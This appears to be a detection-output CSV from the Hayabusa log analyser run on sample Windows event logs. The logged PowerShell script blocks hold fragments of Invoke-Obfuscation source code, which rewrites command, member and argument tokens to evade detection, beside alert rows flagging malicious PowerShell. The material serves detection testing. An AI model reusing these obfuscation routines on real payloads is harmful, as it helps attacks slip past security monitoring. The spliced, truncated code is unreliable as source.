PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. $SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += 